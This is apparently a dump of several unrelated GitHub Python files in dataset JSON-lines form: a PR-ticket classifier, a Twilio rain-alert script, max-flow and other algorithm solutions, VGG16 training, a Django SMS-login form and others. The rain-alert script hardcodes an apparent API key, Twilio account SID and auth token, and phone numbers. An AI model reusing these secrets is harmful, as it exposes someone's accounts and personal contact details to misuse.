return the stem list of tokens\n stems_list.append(' '.join(stem))\n return stems_list\n\nstemming = stem_tokens()\n# The output of tokenized_description after stemming without stopwords: '...'\n\"\"\"tokenized_description: 'default templat common templat pleas fill creat pr chang lremov section tempat detail test need specif made fault report custom made ticket perform gnb softwar upgrad \nreleas rf softwar current lte primari link expect gnb sw activ \"\"\"\n\n\n\"\"\"SNOWBALL STEMMING using SnowballStemmer()\"\"\"\n\ndef snowball_stemming():\n snowball = SnowballStemmer(language=\"english\")\n stems_list = [] # an empty list to append all the data after stemming\n db = client[\"database_test\"]\n collection = db[\"collection_test\"]\n stops = set(stopwords.words(\"english\")) # set of english stopwords\n for doc in collection.find({}):\n description = doc['description']\n words = [tok for tok in description.split() if tok.isalpha() and tok.lower() not in stops]\n stem = [snowball.stem(tok) for tok in words]\n collection.update_one({\"_id\": doc[\"_id\"]},{'$set': {'tokenized_description_snowball': ' '.join(stem)}})\n stems_list.append(' '.join(stem))\n return stems_list\n \nsnowballStem = snowball_stemming()\n#The output is : \n\ndef lancaster_stemming():\n lancaster = LancasterStemmer()\n stems_list = [] # an empty list to append all the data after stemming\n db = client[\"database_test\"]\n collection = db[\"collection_test\"]\n stops = set(stopwords.words(\"english\")) # set of english stopwords\n for doc in collection.find({}):\n description = doc['description']\n words = [tok for tok in description.split() if tok.isalpha() and tok.lower() not in stops]\n stem = [lancaster.stem(tok) for tok in words]\n collection.update_one({\"_id\": doc[\"_id\"]},{'$set': {'tokenized_description_lancaster': ' '.join(stem)}})\n stems_list.append(' '.join(stem))\n return stems_list\n\nlancaster = lancaster_stemming()\n### TO CONTINUE FROM TASK 2 - week 3: rejoin \n\"\"\"TASK 3: Rejoin stemmed tokens and use a TfIdf Vectorizer on the descriptions\"\"\"\n\ndef rejoin_stemmed_words(stemmed_words):\n return [' '.join(words) for words in stemmed_words]\n\n# stemmed_words = stem_tokens() # same as stemming called above \n# joined_words = rejoin_stemmed_words(stemmed_words)\n# print(joined_words)\n\n# tfidf = TfidfVectorizer(tokenizer=stemming, stop_words='english') \n# y = tfidf.fit_transform()\n# print(tfidf.get_feature_names_out())\n# print(y.shape())\n\n\n\"\"\" TASK 4 - Applying a Tfidf Vectorizer on the raw text from description field\"\"\"\ndata_raw = []\nfor doc in collection.find({}):\n data_raw.append(doc['description'])\n\ntfidf_vectorizer = TfidfVectorizer() \ntfidf_raw = tfidf_vectorizer.fit_transform(data_raw)\n# print(\"Raw text:\")\n# print(tfidf_raw.toarray())\n# Initialize the TfidfVectorizer with the desired settings\nvectorizer = TfidfVectorizer()\n# Fit the vectorizer to the list of stemmed descriptions\ntfidf_matrix = vectorizer.fit_transform(snowballStem) # \"stemming\" for Porter Stemmer\n\nprint(tfidf_matrix.shape) # the shape for the tfidf document (for the prontos.json) -- Returns : (2637,5392)\n# tfidf_df = pd.DataFrame(tfidf_matrix.toarray(), columns=vocabulary)\n# print(tfidf_df)\n\nfeature_names = vectorizer.get_feature_names_out()\ntfidf_score = tfidf_matrix.toarray()[0]\n\n# Print the feature names and their corresponding TF-IDF scores if it is a nonzero score in the description \n# for i in range(len(feature_names)):\n# if tfidf_score[i] > 0:\n# print(f\"{feature_names[i]}: {tfidf_score[i]}\")
print(f\"{feature_names[i]}: {tfidf_score[i]}\")\n\ndef tfidf_scores(stemming):\n vectorizer = TfidfVectorizer()\n tfidf_matrix = vectorizer.fit_transform(lancaster) # this was stemming instead of lancaster\n\n feature_names = vectorizer.get_feature_names_out()\n tfidf_score = tfidf_matrix.toarray()[0]\n\n tfidf_dict = {}\n for i in range(len(feature_names)):\n if tfidf_score[i] > 0 :\n tfidf_dict[feature_names[i]] = tfidf_score[i]\n\n return tfidf_dict\n\n\"\"\" print(tfidf_scores(stemming)) \"\"\"\n\n# Example :Get the vocabulary (i.e. the unique terms in the corpus) and the idf values\n# vocabulary = vectorizer.get_feature_names_out()\n# idf_values = vectorizer.idf_\n# print(\"Vocabulary : \", vocabulary)\n# print(\"IDF values : \" , idf_values)\n\n# TASK WEEK 4\n\"\"\"\"Title and description of a PR should be concatenated and then tokenized, stemmed, etc.\"\"\"\nstop_words = set(stopwords.words('english'))\nporter = PorterStemmer()\nsnowball = SnowballStemmer(language=\"english\")\nlancaster = LancasterStemmer()\ndef tokenize_text(text):\n # Tokenize the text and remove stopwords\n tokens = word_tokenize(text.lower())\n filtered_tokens = [token for token in tokens if token not in stop_words and token.isalpha()]\n return filtered_tokens\n\ndef stem_tokens(tokens):\n # Stem the tokens using PorterStemmer\n stemmed_tokens = [lancaster.stem(token) for token in tokens]\n return stemmed_tokens\n\n\n# for this to get a better accuracy we should go above to the stem_tokens() where we used PorterStemmer and use SnowballStemmer (maybe will improve the accuracy)\ndef concat_full(database_test, collection_test):\n db = client[database_test]\n collection = db[collection_test]\n data = []\n for pr in collection.find():\n pr_text = pr[\"title\"] + \" \" + pr[\"description\"] # concatenate the title and description fields and use tokenize on it and then stemming \n tokens = tokenize_text(pr_text)\n stemmed_tokens = stem_tokens(tokens)\n processed_text = ' '.join(stemmed_tokens)\n data.append({\"_id\": str(pr[\"_id\"]), \"processed_text_v2\" : processed_text})\n collection.update_one({\"_id\": pr[\"_id\"]},{\"$set\": {\"processed_text_v2\": processed_text}})\n \n dict_vectorizer = DictVectorizer()\n sparse_matrix = dict_vectorizer.fit_transform(data)\n # print(sparse_matrix)\n return sparse_matrix.toarray() # Sparse matrix on this concat_full() function\n\ntext_concatenate = concat_full('database_test', 'collection_test')\n# print(text_concatenate)\n\n\"\"\" have to do sparsematrix - on this function ( vectorize) like features_extract()\"\"\"\n\n\"\"\"TASK 2 \"\"\"\n# Turn the other data into useful features for our model (DictVectorizer, OneHotEncoder)\n# Getting from the pronto : 'build' , 'feature' fields for now\n\n# Using DictVectorizer\n\ndef features_extract(database_test, collection_test):\n db = client[database_test]\n collection = db[collection_test]\n\n feature_list = []\n for doc in collection.find():\n features = {} \n features['feature'] = doc.get('feature', '')\n features['build'] = doc.get('build', '')\n feature_list.append(features)\n # print(feature_list) # printing the list of all the features that we wanna see , for example : 'build' & 'feature' from the json file\n dict_vectorizer = DictVectorizer()\n sparse_matrix = dict_vectorizer.fit_transform(feature_list)\n # print(sparse_matrix) # printing the sparse_matrix for each stuff inside the fields\n return sparse_matrix.toarray()\n# , dict_vectorizer.get_feature_names_out()\n\nfeatures = features_extract('database_test', 
\n# print(features)\n\n\"\"\"then i have to use train and testset for these 2 functions to get what we need \"\"\"\n\n\n# Concatenate the TFIDF results with the other features extracted\n\n# Turn our categorical groups in charge into numbered fields (LabelEncoder) -- field : groupInCharge --> LabelEncoder()\n\nfrom sklearn.preprocessing import LabelEncoder\ndef encode_groupInCharge(database_test,collection_test, field_name):\n db = client[database_test]\n collection = db[collection_test]\n documents = collection.find({})\n \n # Encode the 'groupInCharge' field using LabelEncoder()\n field = [doc[field_name] for doc in documents]\n encoder = LabelEncoder() \n encoded_labels = encoder.fit_transform(field)\n df = pd.DataFrame({'groupInCharge' : field, 'encoded_labels': encoded_labels})\n # Return the encoded labels as a dataframe to see in detail the encoded_label value for each content in groupInCharge \n return df\n\nencoded_labels = encode_groupInCharge('database_test', 'collection_test', 'groupInCharge')\n# print(encoded_labels)\n\n# Encoding with LabelEncoder for 'state' field ( to have only 2 values ( Closed , Correction Not Needed ) not more than 2 like 'groupInCharge')\n\ndef encode_state(database_test, collection_test, field_name):\n db = client[database_test]\n collection = db[collection_test]\n\n documents = collection.find({})\n\n #Encode 'state' field using LabelEncoder()\n field = [doc[field_name] for doc in documents]\n encoder = LabelEncoder()\n encoded_labels = encoder.fit_transform(field)\n df = pd.DataFrame({'state' : field, 'encoded_labels' : encoded_labels})\n # Return the encoded labels as a dataframe to see in detail the encoded_label value for each content in 'state'\n return df\n\nencoded_label_state = encode_state('database_test', 'collection_test', 'state')\n# print(encoded_label_state)\n\n\n\ndef splitData(database_test, collection_test, test_size=0.2):\n db = client[database_test]\n collection = db[collection_test]\n X = []\n y = []\n for pr in collection.find():\n pr_text = pr['title'] + \" \" + pr['description']\n X.append(pr_text)\n y.append(pr[\"groupInCharge\"])\n\n # Using the CountVectorizer to create a sparse matrix of word counts \n vectorizer = CountVectorizer()\n X_sparse = vectorizer.fit_transform(X) # sparse matrix on the title and description\n # Split the data into training and test sets :\n X_train, X_test, y_train, y_test = train_test_split(X_sparse, y, test_size=test_size, random_state=42)\n # Training using a Decision Tree Classifier:\n clf = DecisionTreeClassifier()\n clf.fit(X_train, y_train)\n # Evaluate the classifier on the test set \n score = clf.score(X_test, y_test)\n print(\"The accuracy is : \", score)\n print(\"Accuracy: {:.2f}%\".format(score * 100))\n return clf\n\nsplitting_data = splitData('database_test', 'collection_test', 0.2)\n\n\n\n\"\"\"WEEK 6\"\"\"\n# Concatenate the sparse matrices from the 2 functions below with HSTACK : https://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.hstack.html\n\n# Train and test data can be used on the 2 matrices concatenated with the help of hstack https://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.hstack.html\n# LabelEncoder() for the BOAM or NOT BOAM ( MANO ) values - a separate function with some IF is not BOAM == .. and so on\n# Fill -- numpy.nan_to_num to replace the missing values with some default, I guess\n\n# Encoding the categoric data from 'groupInCharge' field into labels\ndef label_encodeGIC(database_test,collection_test):\n gic_list = []\n\n cursor = collection.find({})\n for doc in cursor:\n gic = doc['groupInCharge'].split('_', 1)[0] # getting the first word before the '_' in the groupInCharge field\n # print(gic)\n if gic != 'MANO' and gic != 'BOAM':\n gic_list.append('not_BOAM')\n else: \n if gic == 'MANO':\n gic_list.append('BOAM')\n else:\n gic_list.append(gic)\n label_encoder = LabelEncoder()\n gic_encoded = label_encoder.fit_transform(gic_list)\n # print(gic_encoded)\n return gic_encoded\n\nencodingGIC = label_encodeGIC('database_test','collection_test')\n# print(encodingGIC)\n\n# Concatenate the sparse matrices from the 2 functions (concat_full(), feature_extract()) with HSTACK : https://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.hstack.html\n\ndef concatenate(database_test, collection_test):\n feature_extract = features_extract(database_test, collection_test) # (2637,2460)\n concat_text = concat_full(database_test, collection_test) # this is (2637, 5273)\n\n print(\"Features_extract : \", feature_extract.shape)\n print(\"Concat_full : \", concat_text.shape)\n\n # Reshape concat_text to have shape (2637, 5273)\n concat_text_reshaped = np.reshape(concat_text, (concat_text.shape[0], concat_text.shape[1])) # reshaping the concat_full() output so its rows line up with features_extract() for hstacking\n #Convert concat_text_reshaped to a sparse matrix\n concat_text_sparse = scipy.sparse.csr_matrix(concat_text_reshaped)\n\n # Concatenate feature_extract and concat_text_sparse horizontally\n full_concatenate = hstack([feature_extract, concat_text_sparse])\n scipy.sparse.save_npz('sparse_matrix.npz', full_concatenate)\n print(full_concatenate.toarray()) \n print(full_concatenate.shape) # the shape for this concatenate function : (2637,7733)\n return full_concatenate\n\nconcatenated_sparse_matrices = concatenate('database_test','collection_test')\n# print(\"Concatenated Sparse Matrices: \", concatenated_sparse_matrices)\n\n\n\n# DecisionTreeClassifier for this concatenate() function which has 2 sparse matrices concatenated \n\nfrom sklearn.impute import SimpleImputer\ndef train_decision_tree(database_test,collection_test):\n\n\n # Concatenate the sparse matrices\n sparse_matrix = concatenate(database_test, collection_test)\n labels = label_encodeState(database_test, collection_test)\n \n # Split the data into training and testing sets\n X_train, X_test, y_train, y_test = train_test_split(sparse_matrix, labels, test_size=0.2, random_state=42)\n\n # Replace missing values with mean of each feature\n imputer = SimpleImputer(strategy='mean')\n X_train = imputer.fit_transform(X_train)\n X_test = imputer.transform(X_test)\n\n #Train a decision tree classifier : \n clf = DecisionTreeClassifier(random_state=42)\n clf.fit(X_train, y_train)\n\n #Test the model on the testing set\n y_pred = clf.predict(X_test)\n accuracy = accuracy_score(y_test, y_pred)\n print('Accuracy: {:.2f}%'.format(accuracy * 100))\n return clf\n\n\n# clf = train_decision_tree('database_test', 'collection_test')\n\nnp.set_printoptions(threshold=np.inf)\n\n\n# modify this to exclude not_state values but still get a null value for the array\ndef label_encodeState(database_test,collection_test):\n \n state_list = []\n cursor = collection.find({})\n for doc in cursor:\n state = doc['state'] # setting a variable with the 'state' field items
\n if state != 'Closed' and state != 'Correction Not Needed':\n state_list.append('Closed')\n else: \n if state == 'Closed':\n state_list.append('Closed')\n else:\n state_list.append('Correction Not Needed')\n # if(state == 'Closed' and state !='Correction Not Needed'):\n # state_list.append('Closed')\n # elif(state == 'Correction Not Needed'):\n # state_list.append('Correction Not Needed')\n\n\n count_nonzero = np.count_nonzero(state_list)\n print(\"Number of non-zero elements in state_list:\", count_nonzero)\n\n # print(state_list)\n label_encoder = LabelEncoder()\n encoded_states = label_encoder.fit_transform(state_list)\n\n # print(encoded_states)\n return encoded_states\n\nencodingState = label_encodeState('database_test','collection_test')\n\n# modify algorithm to get an accuracy more than 70%\n# Using a Naive Bayes Classifier \n\n# from sklearn.naive_bayes import GaussianNB\n# def gaussian_NB(database_test, collection_test):\n# feature_vect = scipy.sparse.load_npz('sparse_matrix.npz').toarray()\n# feature_vect = np.nan_to_num(feature_vect, copy=False, posinf=0.0, neginf=0.0) # values of 0.0\n# target = label_encodeState(database_test, collection_test)\n\n# X_train, X_test, y_train, y_test = train_test_split(feature_vect, target)\n\n \n# if X_train.shape[0] != y_train.shape[0]:\n# raise ValueError(\"Number of samples in X_train and y_train do not match.\")\n\n# naiveBayes = GaussianNB()\n# predict_target = naiveBayes.fit(X_train, y_train).predict(X_test)\n# # print(\"Number of mislabeled points out of a total %d points : %d\" % (X_test.shape[0], (y_test != predict_target).sum()))\n# accuracy = accuracy_score(y_test, predict_target)\n# print('Accuracy: {:.2f}%'.format(accuracy * 100)) # 100% accuracy because something is wrong with label_encodeGIC with MANO AND BOAM , and i can change the target with state field ( closed and CorrectionNotNeeded)\n\nif __name__ == \"__main__\":\n # gaussian_NB('database_test', 'collection_test')\n train_decision_tree('database_test', 'collection_test')\n\nclient.close()","repo_name":"wohljkee/project_dezvoltare","sub_path":"Examples/improve_accuracy.py","file_name":"improve_accuracy.py","file_ext":"py","file_size_in_byte":19749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39459060365","text":"# https://openweathermap.org/api\nimport requests\nfrom twilio.rest import Client\n\napi_key = \"9f00eb6100a05d1257ec6c7a8539adc1\"\nlatitude = 30.158813\nlongitude = -85.660210\n\naccount_sid = \"ACde902588753db3c01b4ed27c002f3ec4\"\nauth_token = \"0992f5f9de1929fe506446dddd073ae9\"\n\n# Walnut Creek lat and long\n# latitude = 37.901760\n# longitude = -122.061920\n\nparameters = {\n \"lat\": latitude,\n \"lon\": longitude,\n \"appid\": api_key,\n \"exclude\": \"current,minutely,daily,alerts\"\n}\n\nresponse = requests.get(url=\"https://api.openweathermap.org/data/2.5/onecall\", params=parameters)\n# https://api.openweathermap.org/data/2.5/onecall?lat={lat}&lon={lon}&exclude={part}&appid={API key}\n# print(response.status_code)\n# print()\nresponse.raise_for_status()\ndata = response.json()\n\ntwelve_hours = data[\"hourly\"][0:12]\n\nwill_rain = False\n\nfor hour in twelve_hours:\n weather_code = hour['weather'][0]['id']\n if int(weather_code) < 700:\n will_rain = True\n\nif will_rain:\n client = Client(account_sid, auth_token)\n message = client.messages \\\n .create(\n body=\"It's going to rain today. 
Remember to bring an ☔️\",\n from_='+16364668733',\n to='+19253307691'\n )\n print(message.status)","repo_name":"btwmendes/100-Days-of-Code","sub_path":"day_35_rain_alert/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71707237992","text":"\"\"\"\nTheorem\nSuppose G = (V , E) is a flow network and f is a flow. The following are equivalent:\nf is a maximum flow in G.\nThe residual network has no augmenting path.\n|f| = C (S, T) for some cut (S, T) of G.\n\nRuntime using a DFS: O(Ef), where E is the number of edges and f is the maximum flow.\nRuntime using a BFS: O(VE^2), where V is the number of vertices.\n\"\"\"\n\n\ndef bfs(graph, source, sink, parent):\n visited = [False] * len(graph)\n queue = [source]\n visited[source] = True\n\n while queue:\n u = queue.pop(0)\n for ind, val in enumerate(graph[u]):\n if not visited[ind] and val > 0:\n queue.append(ind)\n visited[ind] = True\n parent[ind] = u\n\n return visited[sink]\n\n\ndef ford_fulkerson(graph, source, sink):\n parent = [-1] * (len(graph))\n max_flow = 0\n\n while bfs(graph, source, sink, parent):\n path_flow = float(\"Inf\")\n s = sink\n while s != source:\n path_flow = min(path_flow, graph[parent[s]][s])\n s = parent[s]\n\n max_flow += path_flow\n v = sink\n while v != source:\n u = parent[v]\n graph[u][v] -= path_flow\n graph[v][u] += path_flow\n v = parent[v]\n\n return max_flow\n\n\nmatrix = [[0, 4, 0, 0, 0, 0, 0, 8, 0],\n [4, 0, 8, 0, 0, 0, 0, 11, 0],\n [0, 8, 0, 7, 0, 4, 0, 0, 2],\n [0, 0, 7, 0, 9, 14, 0, 0, 0],\n [0, 0, 0, 9, 0, 10, 0, 0, 0],\n [0, 0, 4, 14, 10, 0, 2, 0, 0],\n [0, 0, 0, 0, 0, 2, 0, 1, 6],\n [8, 11, 0, 0, 0, 0, 1, 0, 7],\n [0, 0, 2, 0, 0, 0, 6, 7, 0]]\n\nprint(ford_fulkerson(matrix, 0, 5))\n","repo_name":"anutabutsko/algorithms","sub_path":"src/graph_algorithms/network_flow/ford_fulkerson/ford_fulkerson.py","file_name":"ford_fulkerson.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32716723320","text":"from collections import Counter\n\ndef solution(gems):\n answer = []\n n = len(set(gems))\n left = 0\n counter = Counter()\n for right in range(len(gems)):\n counter[gems[right]] += 1\n right += 1\n while len(counter) == n:\n counter[gems[left]] -= 1\n if counter[gems[left]] == 0:\n del counter[gems[left]]\n left += 1\n answer.append([left, right])\n \n return sorted(answer, key=lambda x: (x[1] - x[0], x[0]))[0]","repo_name":"ohilikeit/Coding_Test_Practice","sub_path":"프로그래머스/lv3/67258. 
[카카오 인턴] 보석 쇼핑/[카카오 인턴] 보석 쇼핑.py","file_name":"[카카오 인턴] 보석 쇼핑.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10806342539","text":"import keras\nfrom keras.models import Model\nfrom keras.layers import Dense\nfrom keras import optimizers\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.preprocessing import image\n\ntrain_gen = ImageDataGenerator()\ntraining_set = train_gen.flow_from_directory(directory=\"dataset/training_set\",target_size=(224,224))\ntest_gen = ImageDataGenerator()\ntest_set = test_gen.flow_from_directory(directory=\"dataset/test_set\", target_size=(224,224))\n\nfrom keras.applications.vgg16 import VGG16\nvggmodel = VGG16(weights='imagenet', include_top=True)\n\nprint(vggmodel.summary())\n\nfor layers in (vggmodel.layers)[:19]:\n print(layers)\n layers.trainable = False\n\nX= vggmodel.layers[-2].output\npredictions = Dense(2, activation=\"softmax\")(X)\nmodel_final = Model(input = vggmodel.input, output = predictions)\n\nmodel_final.compile(loss = \"categorical_crossentropy\", optimizer = optimizers.SGD(lr=0.0001, momentum=0.9), metrics=[\"accuracy\"])\nprint(model_final.summary())\n\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\ncheckpoint = ModelCheckpoint(\"vgg16_pretrained.h5\", monitor='val_accuracy', verbose=1, save_best_only=True, save_weights_only=False, mode='auto', period=1)\nearly = EarlyStopping(monitor='val_accuracy', min_delta=0, patience=20, verbose=1, mode='auto')\nhist = model_final.fit_generator(generator= training_set, steps_per_epoch= 2, epochs= 100, validation_data= test_set, validation_steps=1, callbacks=[checkpoint,early])\n\nprint(\"pretrained_vgg16_class_indices\", training_set.class_indices)\nf = open(\"pretrained_vgg16_class_indices.txt\", \"w\")\nf.write(str(training_set.class_indices))\nf.close()\n\nimport matplotlib.pyplot as plt\n\nplt.plot(hist.history[\"accuracy\"])\nplt.plot(hist.history['val_accuracy'])\nplt.plot(hist.history['loss'])\nplt.plot(hist.history['val_loss'])\nplt.title(\"model accuracy\")\nplt.ylabel(\"Accuracy\")\nplt.xlabel(\"Epoch\")\nplt.legend([\"Accuracy\",\"Validation Accuracy\",\"loss\",\"Validation Loss\"])\nplt.show()\n\n\n","repo_name":"BK-Modding/dogs-vs-cats-image-classifier","sub_path":"pretrained_vgg16_train.py","file_name":"pretrained_vgg16_train.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19158789934","text":"import time\nimport pyautogui\nimport Test_Script.common_function as co\n\n\nlog = co.logger()\n\n\ndef check_window(runflag, picture):\n count = 0\n time.sleep(3)\n if runflag == \"F\":\n system_window = pyautogui.locateOnScreen(picture)\n if system_window is not None:\n log.info(\"window opens successfully\")\n return True\n else:\n while count <= 5:\n log.info(\"window opens failed!\")\n count += 1\n if count == 6:\n return False\n else:\n system_window = pyautogui.locateOnScreen(picture)\n if system_window is None:\n log.info(\"window closes successfully\")\n return True\n else:\n while count <= 5:\n log.info(\"window closes failed!\")\n count += 1\n if count == 6:\n return False\n\n\n","repo_name":"nettlay/linuxTP7","sub_path":"Test_Script/Check_window.py","file_name":"Check_window.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"40794976235","text":"from django import forms\nfrom django.conf import settings\nfrom django.core.validators import RegexValidator\nfrom django.http import HttpResponse\nfrom jsonschema.exceptions import ValidationError\n\nfrom user import models\nfrom utils.tencent.sms import send_sms_single\nimport random\nfrom user.forms.bootstrap import BootStrap\n\n\nclass LoginSmsForm(BootStrap, forms.Form):\n mobile_phone = forms.CharField(\n label='手机号',\n validators=[RegexValidator(r'^(1[3|4|5|6|7|8|9])\\d{9}$', '手机号格式不正确'), ]\n )\n code = forms.CharField(\n label='验证码',\n widget=forms.TextInput())\n\n def __init__(self, request, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.request = request\n\n # 未进行检验\n # def clean_mobile_phone(self):\n # mobile_phone = self.cleaned_data['mobile_phone']\n # exists = models.UserInfo.objects.filter(mobile_phone=mobile_phone).exists()\n #\n # if not exists:\n # raise ValidationError('⼿机号不存在')\n # return mobile_phone\n # #\n def clean_code(self):\n code = self.cleaned_data['code']\n print(code)\n mobile_phone = self.cleaned_data.get('mobile_phone')\n # ⼿机号不存在,则验证码⽆需再校验\n if not mobile_phone:\n return code\n session_code = self.request.session.get('code') # 从session中获取验证码\n if not session_code:\n raise ValidationError('验证码失效或未发送,请重新发送')\n # redis_str_code = redis_code.decode('utf-8')\n if code.strip().upper() != session_code.strip().upper():\n raise ValidationError('验证码错误,请重新输⼊')\n return code\n","repo_name":"fukioston/FleaMarket","sub_path":"user/forms/login_sms_form.py","file_name":"login_sms_form.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12577616164","text":"\n# 육각형이니까\n# 2~7 : 2개 (6개까지)\n# 8~19: 3개 (12개까지)\n# 20~37 : 4개 (18개까지)\n\nn = int(input())\nresult = 1\ncnt = 1\n\nwhile n > result:\n result += 6 * cnt\n cnt += 1\n\nprint(cnt)\n\n\n","repo_name":"haremeat/Algorithm","sub_path":"boj/2292.py","file_name":"2292.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42667797272","text":"#이것이 코딩 테스트다\n#정렬 : 데이터를 특정 기준에 따라 순서대로 나열하는 것\n#성적이 낮은 순서로 학생 출력하기 (오름차순) \n\nn = int(input())\narray = []\nfor i in range(n) :\n input_data = input().split()\n array.append((input_data[0], input_data[1]))\n\narray = sorted(array, key=lambda student: student[1])\n\nfor student in array :\n print(student[0], end = ' ')","repo_name":"parkjeongmi/jamie_study","sub_path":"sort/sort12_2.py","file_name":"sort12_2.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13300467496","text":"def DetectCurrentFace( hebi, Group ):\n\n import scipy.io as scio\n import sys\n import numpy as np\n\n### This was used for testing purposes only\n\n # import hebi # for the Hebi motors\n # from time import sleep\n #\n # # Need to look into XML formatting for Hebi Gains\n # # sio.loadmat('defaultGains.mat')\n #\n # lookup = hebi.Lookup() # Get table of all Hebi motors\n # sleep(2) # gives the Lookup process time to discover modules\n #\n # # Displays the Hebi modules found on the network\n # print('Modules found on the network:')\n #\n # for entry in lookup.entrylist:\n # print('{0} | {1}'.format(entry.family, entry.name))\n #\n # # print('\\n')\n #\n # var = raw_input('Were any modules found? 
\n if var == 'y':\n print('\\nYay!\\n')\n elif var == 'Y':\n print('\\nYay!\\n')\n else:\n print('\\nNONE FOUND!\\n')\n sys.exit()\n #\n # Group = lookup.get_group_from_family('*')\n # infoTable = Group.request_info()\n\n### This was used for testing purposes only\n\n trainingData = scio.loadmat('IMUTrainingRutgers.mat') # training data gathered from MATLAB\n\n labels = float(trainingData['labs'][0][0][0])\n\n for i in range(1,len(trainingData['labs'])):\n labels = np.append(labels, float(trainingData['labs'][i][0][0]))\n\n # Create KNN model\n from sklearn.neighbors import KNeighborsRegressor\n knn = KNeighborsRegressor(n_neighbors=10)\n # Fit the model\n knn.fit(trainingData['trainingData'], labels)\n\n fbk = hebi.GroupFeedback(Group.size)\n Group.feedback_frequency = 200.0\n fbk = Group.get_next_feedback(reuse_fbk=fbk)\n\n # if(fbk.size != trainingData['nbMotors'][0][0]):\n # print('Something is wrong with the number of connected motors!')\n # return 0\n\n accel = fbk.accelerometer.reshape(1,-1)\n [d, n] = knn.kneighbors(accel, 10) # give the lines which most closely match in variable \"n\"\n predicted_lines = np.asanyarray(labels[n[0]], dtype=int) # obtains the label values which were predicted in \"n\"\n counts = np.bincount(predicted_lines) # counts each instance of face numbers\n face = np.argmax(counts) # finds the face with the highest number of instances [THIS IS OUR PREDICTION]\n\n return face\n","repo_name":"JEB12345/SB2_python_scripts","sub_path":"DetectCurrentFace.py","file_name":"DetectCurrentFace.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18664383989","text":"import re, sys, collections\nimport os\nfrom concurrent.futures import ThreadPoolExecutor\nimport threading\n\n# stopwords = set(open('stop_words').read().split(','))\n# words = re.findall('\\\\w{3,}', open(sys.argv[1]).read().lower())\n# counts = collections.Counter(w for w in words if w not in stopwords)\n# for (w, c) in counts.most_common(25):\n# print(w, '-', c)\n\ntotalCount = collections.Counter()\nlock = threading.Lock() \n\ndef calcWords(file):\n stopwords = set(open('stop_words').read().split(','))\n words = re.findall('\\\\w{3,}', open(file).read().lower())\n counts = collections.Counter(w for w in words if w not in stopwords)\n \n # guard shared mutable state totalCount with a lock\n lock.acquire()\n totalCount.update(counts)\n lock.release()\n\n\nfileList = []\n\n# create a list of all the txt files to be read\nfor files in os.listdir(\"./\"):\n if files.endswith(\".txt\"):\n fileList.append(files)\n\n# start a thread for each txt file\nwith ThreadPoolExecutor() as executor:\n for file in fileList:\n executor.submit(calcWords, file)\n\nfor (w, c) in totalCount.most_common(25):\n print(w, '-', c)","repo_name":"justincavalli/ConcurrentPrograms","sub_path":"PythonWordCounter/tf.py","file_name":"tf.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44119915765","text":"import numpy as np\nfrom matplotlib.colors import ListedColormap\n\ndef plot_classf_model(X, y, model, ax, title=None, step=0.01, epsilon=0.1, contour=False):\n \"\"\"\n Contourplot a two-class underlying model, and test datapoints.\n \n Parameters\n ---------\n X: Matrix(mxn, R)\n Matrix of feature vectors with examples\n y: m-dimensional vector \n Actual classes for each of the 'm' provided examples.\n \"\"\"
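\n # sketch of what follows: rasterise the model's decision surface with np.mgrid,\n # predict on the flattened grid via np.c_, reshape, then draw it with pcolormesh.\n # hypothetical usage (names assumed, not from this repo):\n # plot_classf_model(X, y, fitted_model, plt.gca(), title='decision regions')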
custom_cmap = ListedColormap(['#fafab0','#9898ff','#a0faa0'])\n points_cmap = ListedColormap([\"Yellow\", \"Blue\"])\n x0, x1 = X[:,0].min() - epsilon, X[:,0].max() + epsilon\n y0, y1 = X[:,1].min() - epsilon, X[:,1].max() + epsilon\n \n xx, yy = np.mgrid[x0:x1:step, y0:y1:step]\n \n preds = model.predict(np.c_[xx.ravel(), yy.ravel()])\n preds = preds.reshape(xx.shape)\n \n if contour:\n ax.contour(xx, yy, preds)\n ax.pcolormesh(xx, yy, preds, cmap=custom_cmap)\n ax.scatter(*X.T, c=y, s=50, edgecolor=\"k\", cmap=points_cmap)\n if title is not None:\n ax.set_title(title)","repo_name":"Fegrodz/Machine-Learning-Proyects","sub_path":"files/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38144726459","text":"import json\nimport os\n\nimport frappe\nfrom frappe import _\nfrom frappe.contacts.doctype.contact.contact import get_default_contact\nfrom frappe.model.document import Document\nfrom frappe.utils import date_diff, flt, get_url, nowdate\n\n\nclass EmailMissing(frappe.ValidationError):\n\tpass\n\n\nclass GSTSettings(Document):\n\tdef onload(self):\n\t\tdata = frappe._dict()\n\t\tdata.total_addresses = frappe.db.sql(\n\t\t\t'''select count(*) from 